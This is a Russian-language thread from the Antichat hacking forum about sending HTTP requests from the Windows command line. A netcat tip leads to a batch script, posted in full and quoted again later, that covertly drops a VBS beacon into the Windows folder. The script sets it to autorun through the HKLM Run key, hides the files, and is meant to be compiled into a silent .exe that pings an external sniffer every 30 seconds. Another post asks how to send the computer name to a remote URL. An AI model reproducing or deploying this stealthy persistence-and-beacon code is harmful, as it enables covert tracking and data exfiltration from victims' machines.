ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Программирование > С/С++, C#, Delphi, .NET, Asm
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

post\get in CMD
  #1  
Старый 01.03.2010, 21:36
aka_k4
Участник форума
Регистрация: 05.02.2009
Сообщений: 133
Провел на форуме:
910039

Репутация: 86
По умолчанию post\get in CMD

Друзья,

можно ли через консоль организоваь пост гет запрос?

т.е. открыть браузер и перейти на сайт, это одно, но нужен запрос только в окне кансоли, как например брут хттп в Hydra.

Кто падскажет иле хотя бы натолкнет на мыслю?
 
Ответить с цитированием

  #2  
Старый 01.03.2010, 21:45
bons
Участник форума
Регистрация: 20.12.2007
Сообщений: 295
Провел на форуме:
1777055

Репутация: 347
По умолчанию

можно через netcat:
Код:
cat request.txt | netcat site.com 80 > response.txt
при этом request.txt содержит полностью GET или POST запрос
 
Ответить с цитированием

  #3  
Старый 01.03.2010, 21:48
aka_k4
Участник форума
Регистрация: 05.02.2009
Сообщений: 133
Провел на форуме:
910039

Репутация: 86
По умолчанию

спасибо большое. хорошо.

альтернативы есть? ( не то штобы метод не подхадил, просто хачу паглубжэ прознать вопрос)

Цитата:
Сообщение от bons  
при этом request.txt содержит полностью GET или POST запрос
request.txt может храниться на хосте? либо только на машине на которой выполняетца гет\пост?
 
Ответить с цитированием

  #4  
Старый 01.03.2010, 21:58
HellFire
Познающий
Регистрация: 18.01.2009
Сообщений: 62
Провел на форуме:
2832076

Репутация: 42
По умолчанию

Так же интересует как будет выглядеть посыл на сниффер в request.txt ?

Прям так туда и записать ?

GET http://host.com/public/s.gif HTTP/1.1
Host: host.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2) Gecko/20100115 Firefox/3.6 Paros/3.2.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru,en-us;q=0.7,en;q=0.3
Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Как беспалевнее послать на сниффер через .bat ?

И возможно ли это вообще ?

Последний раз редактировалось HellFire; 01.03.2010 в 22:02..
 
Ответить с цитированием

  #5  
Старый 01.03.2010, 22:06
aka_k4
Участник форума
Регистрация: 05.02.2009
Сообщений: 133
Провел на форуме:
910039

Репутация: 86
По умолчанию

Как беспалевнее послать на сниффер через .bat ?

в приципе между строк вапросов сабжа имено это я и хотел передать) + поправочка - беспалева
 
Ответить с цитированием

  #6  
Старый 01.03.2010, 22:58
HellFire
Познающий
Регистрация: 18.01.2009
Сообщений: 62
Провел на форуме:
2832076

Репутация: 42
По умолчанию

Изящное решение для такого посыла на сниффер делаем такой батник:

Код:
MD %SystemRoot%\123123
echo >%SystemRoot%\123123\123.vbs
echo Set oHTTP = WScript.CreateObject("winhttp.winhttprequest.5.1") >%SystemRoot%\123123\123.vbs
echo iPeriod = 30 >>%SystemRoot%\123123\123.vbs
echo sSource = "http://host.com/public/s.gif" >>%SystemRoot%\123123\123.vbs
echo iTimer = Timer >>%SystemRoot%\123123\123.vbs
echo While 1 >>%SystemRoot%\123123\123.vbs
echo     WScript.Sleep 1000 >>%SystemRoot%\123123\123.vbs
echo         If (Timer - iTimer)  * 3 Then >>%SystemRoot%\123123\123.vbs
echo         oHTTP.open "GET", sSource, False >>%SystemRoot%\123123\123.vbs
echo           on error resume next >>%SystemRoot%\123123\123.vbs
echo         oHTTP.send >>%SystemRoot%\123123\123.vbs
echo         iTimer = Timer >>%SystemRoot%\123123\123.vbs
echo     End If >>%SystemRoot%\123123\123.vbs
echo WEnd >>%SystemRoot%\123123\123.vbs
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v 123 /t REG_SZ /d %SystemRoot%\123123\123.vbs /f
start "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\123" %SystemRoot%\123123\123.vbs
attrib /d %systemdrive%\Docume~1\123 +h +s
Это добро пропускается через QBFC в ghost режиме и делается .exe - получаем что то вроде "бек-коннекта" на сниффер.

Учтите что лог сниффера будет постоянно засран.

echo iPeriod = 30 >>%SystemRoot%\123123\123.vbs - Кол-во секунд до следующего захода на сниффер целью, в данном случае оно равно 30 секундам.

Для тестирования вот вам сорсы сниффера - http://kanick.ru/sniffer/public.rar

Лечится так:

1. Пуск>выполнить>msconfig>автоза рузка>убрать галку с 123
2. Удалить фаил С:/windows/123123/123.vbs
3. Убить процесс wscript.exe

Радуемся и пляшем.

Последний раз редактировалось HellFire; 01.03.2010 в 23:25..
 
Ответить с цитированием

  #7  
Старый 01.03.2010, 23:10
aka_k4
Участник форума
Регистрация: 05.02.2009
Сообщений: 133
Провел на форуме:
910039

Репутация: 86
По умолчанию

Фаер крутой, вапрос закрыт
 
Ответить с цитированием

  #8  
Старый 11.05.2010, 19:32
mazaxaka
Участник форума
Регистрация: 16.02.2008
Сообщений: 177
Провел на форуме:
883446

Репутация: 82
По умолчанию

А можно ли просто из cmd отправить гет\пост запрос такого типа
http://site.ru/undex.php?name=%COMPUTERNAME%
без использования vb скрипта?
 
Ответить с цитированием

  #9  
Старый 11.05.2010, 19:52
Adio
Постоянный
Регистрация: 23.05.2005
Сообщений: 617
Провел на форуме:
1262031

Репутация: 71


По умолчанию

Цитата:
Сообщение от HellFire  
Изящное решение для такого посыла на сниффер делаем такой батник:

Код:
MD %SystemRoot%\123123
echo >%SystemRoot%\123123\123.vbs
echo Set oHTTP = WScript.CreateObject("winhttp.winhttprequest.5.1") >%SystemRoot%\123123\123.vbs
echo iPeriod = 30 >>%SystemRoot%\123123\123.vbs
echo sSource = "http://host.com/public/s.gif" >>%SystemRoot%\123123\123.vbs
echo iTimer = Timer >>%SystemRoot%\123123\123.vbs
echo While 1 >>%SystemRoot%\123123\123.vbs
echo     WScript.Sleep 1000 >>%SystemRoot%\123123\123.vbs
echo         If (Timer - iTimer)  * 3 Then >>%SystemRoot%\123123\123.vbs
echo         oHTTP.open "GET", sSource, False >>%SystemRoot%\123123\123.vbs
echo           on error resume next >>%SystemRoot%\123123\123.vbs
echo         oHTTP.send >>%SystemRoot%\123123\123.vbs
echo         iTimer = Timer >>%SystemRoot%\123123\123.vbs
echo     End If >>%SystemRoot%\123123\123.vbs
echo WEnd >>%SystemRoot%\123123\123.vbs
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v 123 /t REG_SZ /d %SystemRoot%\123123\123.vbs /f
start "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\123" %SystemRoot%\123123\123.vbs
attrib /d %systemdrive%\Docume~1\123 +h +s
Это добро пропускается через QBFC в ghost режиме и делается .exe - получаем что то вроде "бек-коннекта" на сниффер.

Учтите что лог сниффера будет постоянно засран.

echo iPeriod = 30 >>%SystemRoot%\123123\123.vbs - Кол-во секунд до следующего захода на сниффер целью, в данном случае оно равно 30 секундам.

Для тестирования вот вам сорсы сниффера - http://kanick.ru/sniffer/public.rar

Лечится так:

1. Пуск>выполнить>msconfig>автоза рузка>убрать галку с 123
2. Удалить фаил С:/windows/123123/123.vbs
3. Убить процесс wscript.exe

Радуемся и пляшем.
Это круто ! уже правдо где то было на ачате
 
Ответить с цитированием

  #10  
Старый 11.05.2010, 20:00
Adio
Постоянный
Регистрация: 23.05.2005
Сообщений: 617
Провел на форуме:
1262031

Репутация: 71


По умолчанию

Цитата:
Сообщение от mazaxaka  
А можно ли просто из cmd отправить гет\пост запрос такого типа
http://site.ru/undex.php?name=%COMPUTERNAME%
без использования vb скрипта?
фантазируй
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
bat файл запуска файла через cmd InfNet Windows системы 5 07.03.2010 04:45
Как запустить файл win32 из под cmd? Student :) Болталка 12 03.11.2009 07:53
из CMD в html Lomik_v_rukave Windows 9 12.08.2009 17:43



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ